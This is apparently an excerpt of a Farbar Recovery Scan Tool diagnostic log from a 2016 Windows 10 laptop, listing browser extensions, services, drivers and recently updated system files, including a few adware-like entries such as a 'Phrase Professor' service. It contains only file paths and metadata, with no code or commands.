CHR Extension: (Google Wallet) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-07]
CHR Extension: (Gmail) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-07-07]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [chgdeabpmphfhkoemjjglmilajldekbp] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRChromePlugin.crx [2015-07-09]
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [kanflfepiobnpjbljmngfgegijhdpljm] - C:\Program Files (x86)\HP SimplePass\tschrome.crx [2013-04-01]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 EgisTec Service; C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisService.exe [689008 2010-03-25] (Egis Technology Inc. )
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [5738528 2014-11-07] (Fitbit, Inc.) [File not signed]
R2 FPLService; C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe [1641768 2013-06-07] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [46904 2013-12-17] (Hewlett-Packard Company)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [330136 2015-10-30] (Intel Corporation)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140456 2012-03-27] ()
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [128896 2012-07-17] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
R2 NS; C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\NS.exe [282016 2015-11-20] (Symantec Corporation)
R2 OhufgaFyfves; C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe [178536 2015-12-18] ()
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-07-17] (Synaptics Incorporated)
S3 TrueService; C:\Program Files\Common Files\AuthenTec\TrueService.exe [401856 2013-01-07] (AuthenTec, Inc.)
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [28160 2012-09-06] () [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S2 EraserSvc11511; "C:\Program Files (x86)\Norton Security\Engine\22.5.4.24\NS.exe" /h ccCommon [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\BASHDefs\20160213.003\BHDrvx64.sys [1665608 2015-10-08] (Symantec Corporation)
R1 bsdriver; C:\WINDOWS\system32\drivers\bsdriver.sys [34712 2015-12-18] ()
R1 ccSet_NS; C:\Windows\system32\drivers\NSx64\1605050.00F\ccSetx64.sys [173808 2015-09-23] (Symantec Corporation)
S1 cherimoya; C:\Windows\System32\drivers\cherimoya.sys [9264 2015-12-18] ()
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [498512 2015-12-23] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [157520 2015-12-23] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\IPSDefs\20160307.001\IDSvia64.sys [767224 2016-02-15] (Symantec Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160308.006\ENG64.SYS [138488 2015-12-23] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160308.006\EX64.SYS [2148080 2015-12-23] (Symantec Corporation)
R3 netr28x; C:\Windows\system32\DRIVERS\netr28x.sys [2554528 2015-06-12] (MediaTek Inc.)
S3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek                                            )
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-07-17] (Synaptics Incorporated)
R1 SRTSP; C:\Windows\System32\Drivers\NSx64\1605050.00F\SRTSP64.SYS [928496 2015-11-11] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NSx64\1605050.00F\SRTSPX64.SYS [50936 2015-09-23] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\NSx64\1605050.00F\SYMEFASI64.SYS [1621232 2015-11-11] (Symantec Corporation)
S0 SymELAM; C:\Windows\System32\drivers\NSx64\1605050.00F\SymELAM.sys [24192 2015-09-23] (Symantec Corporation)
R3 SymEvent; C:\WINDOWS\system32\Drivers\SYMEVENT64x86.SYS [111344 2015-12-24] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NSx64\1605050.00F\Ironx64.SYS [297720 2015-09-23] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NSx64\1605050.00F\SYMNETS.SYS [577768 2015-11-11] (Symantec Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-02-08] (Hewlett-Packard Development Company, L.P.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-08 17:33 - 2016-03-08 17:33 - 02374144 _____ (Farbar) C:\Users\levilaing\Downloads\FRST64.exe
2016-03-08 17:33 - 2016-03-08 17:33 - 00032606 _____ C:\Users\levilaing\Downloads\FRST.txt
2016-03-08 17:32 - 2016-03-08 17:32 - 01725440 _____ (Farbar) C:\Users\levilaing\Downloads\FRST.exe
2016-03-08 17:29 - 2016-03-08 17:32 - 00000253 _____ C:\Users\levilaing\Downloads\Search.txt
2016-03-08 17:16 - 2016-03-08 17:33 - 00000000 ____D C:\FRST
2016-03-08 16:37 - 2016-03-08 16:38 - 00041639 _____ C:\Users\levilaing\Downloads\Addition.txt
2016-03-01 13:31 - 2016-03-01 13:31 - 00000860 _____ C:\WINDOWS\system32\Drivers\etc\hosts.bak
2016-03-01 13:27 - 2016-03-01 13:27 - 00111288 _____ (Symantec Corporation) C:\WINDOWS\system32\Drivers\SMR501.SYS.bak
2016-03-01 13:26 - 2016-03-01 13:50 - 00000000 ____D C:\Users\levilaing\AppData\Local\NPE
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-01 12:58 - 2016-02-23 05:23 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-03-01 12:58 - 2016-02-23 05:22 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-01 12:58 - 2016-02-23 05:15 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-03-01 12:58 - 2016-02-23 04:32 - 08705672 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 04:31 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-03-01 12:58 - 2016-02-23 04:21 - 22564328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-03-01 12:58 - 2016-02-23 04:21 - 06606568 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-03-01 12:58 - 2016-02-23 03:45 - 02773096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2016-03-01 12:58 - 2016-02-23 03:45 - 01998176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-03-01 12:58 - 2016-02-23 03:45 - 00576352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-03-01 12:58 - 2016-02-23 03:38 - 06952088 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 03:27 - 21124344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-03-01 12:58 - 2016-02-23 03:26 - 05241984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-03-01 12:58 - 2016-02-23 02:58 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-03-01 12:58 - 2016-02-23 02:29 - 00591872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-03-01 12:58 - 2016-02-23 02:28 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-03-01 12:58 - 2016-02-23 02:09 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-03-01 12:58 - 2016-02-23 02:00 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-03-01 12:58 - 2016-02-23 01:58 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-03-01 12:58 - 2016-02-23 01:30 - 01731584 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-03-01 12:58 - 2016-02-23 01:24 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-03-01 12:58 - 2016-02-23 00:52 - 11545600 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:50 - 22396416 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-03-01 12:58 - 2016-02-23 00:50 - 09919488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:40 - 24603136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 02581504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 19341312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 18680320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 12125696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-03-01 12:58 - 2016-02-23 00:33 - 14254080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-03-01 12:58 - 2016-02-08 21:24 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-03-01 12:58 - 2016-02-08 21:04 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-03-01 12:57 - 2016-02-23 05:29 - 01030416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-03-01 12:57 - 2016-02-23 05:29 - 00874968 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-03-01 12:57 - 2016-02-23 05:27 - 07475040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-03-01 12:57 - 2016-02-23 05:27 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-03-01 12:57 - 2016-02-23 05:27 - 01141504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-03-01 12:57 - 2016-02-23 05:25 - 02152288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-03-01 12:57 - 2016-02-23 05:25 - 01818696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-03-01 12:57 - 2016-02-23 05:25 - 00563552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2016-03-01 12:57 - 2016-02-23 05:15 - 00779384 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskschd.dll
2016-03-01 12:57 - 2016-02-23 05:09 - 01614176 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-03-01 12:57 - 2016-02-23 05:08 - 00989536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-03-01 12:57 - 2016-02-23 04:34 - 01859960 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-03-01 12:57 - 2016-02-23 04:34 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00696160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00389992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 02544264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01152328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01062480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00498448 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-03-01 12:57 - 2016-02-23 04:31 - 01017032 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00847656 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00819648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00476728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2016-03-01 12:57 - 2016-02-23 04:25 - 03671888 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-03-01 12:57 - 2016-02-23 04:22 - 00572272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskschd.dll
2016-03-01 12:57 - 2016-02-23 04:17 - 00146272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2016-03-01 12:57 - 2016-02-23 03:49 - 00216416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-03-01 12:57 - 2016-02-23 03:45 - 00394080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-03-01 12:57 - 2016-02-23 03:45 - 00259336 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-03-01 12:57 - 2016-02-23 03:44 - 00640984 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-03-01 12:57 - 2016-02-23 03:44 - 00147808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-03-01 12:57 - 2016-02-23 03:40 - 00430944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-03-01 12:57 - 2016-02-23 03:39 - 00502112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 02180136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00980352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00895080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00882720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00709176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00450912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00420928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2016-03-01 12:57 - 2016-02-23 03:37 - 00713824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:32 - 00791744 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-03-01 12:57 - 2016-02-23 03:30 - 02919320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-03-01 12:57 - 2016-02-23 03:27 - 00376536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 03:25 - 00534368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2016-03-01 12:57 - 2016-02-23 03:20 - 01139712 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSave.dll
2016-03-01 12:57 - 2016-02-23 03:20 - 00238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-03-01 12:57 - 2016-02-23 03:19 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-03-01 12:57 - 2016-02-23 03:17 - 00649216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-03-01 12:57 - 2016-02-23 03:12 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\provpackageapidll.dll
2016-03-01 12:57 - 2016-02-23 03:10 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-03-01 12:57 - 2016-02-23 03:07 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 03:07 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-03-01 12:57 - 2016-02-23 03:06 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\flvprophandler.dll
2016-03-01 12:57 - 2016-02-23 03:01 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-03-01 12:57 - 2016-02-23 03:00 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-03-01 12:57 - 2016-02-23 03:00 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00187744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\irmon.dll
2016-03-01 12:57 - 2016-02-23 02:57 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:56 - 02186864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2016-03-01 12:57 - 2016-02-23 02:55 - 00221600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-03-01 12:57 - 2016-02-23 02:55 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2016-03-01 12:57 - 2016-02-23 02:54 - 00539256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-03-01 12:57 - 2016-02-23 02:54 - 00141664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-03-01 12:57 - 2016-02-23 02:53 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2016-03-01 12:57 - 2016-02-23 02:53 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-03-01 12:57 - 2016-02-23 02:52 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2016-03-01 12:57 - 2016-02-23 02:50 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-03-01 12:57 - 2016-02-23 02:48 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-03-01 12:57 - 2016-02-23 02:48 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 02:40 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-03-01 12:57 - 2016-02-23 02:39 - 00178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00287712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-03-01 12:57 - 2016-02-23 02:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuickActionsDataModel.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 02:33 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\MBMediaManager.dll
2016-03-01 12:57 - 2016-02-23 02:32 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-03-01 12:57 - 2016-02-23 02:31 - 00463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-03-01 12:57 - 2016-02-23 02:30 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-03-01 12:57 - 2016-02-23 02:28 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-03-01 12:57 - 2016-02-23 02:27 - 00307712 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-03-01 12:57 - 2016-02-23 02:26 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe
2016-03-01 12:57 - 2016-02-23 02:25 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-03-01 12:57 - 2016-02-23 02:25 - 00229376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-03-01 12:57 - 2016-02-23 02:23 - 00412672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-03-01 12:57 - 2016-02-23 02:22 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 02:22 - 00451584 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00606720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00493568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00948736 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2016-03-01 12:57 - 2016-02-23 02:18 - 00557056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00828928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 02:13 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-03-01 12:57 - 2016-02-23 02:13 - 00286720 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-03-01 12:57 - 2016-02-23 02:12 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 02:11 - 01224704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-03-01 12:57 - 2016-02-23 02:11 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00997376 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00474624 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 01390592 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-03-01 12:57 - 2016-02-23 02:09 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 00870400 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 01848832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-03-01 12:57 - 2016-02-23 02:06 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-03-01 12:57 - 2016-02-23 02:05 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:04 - 01131520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
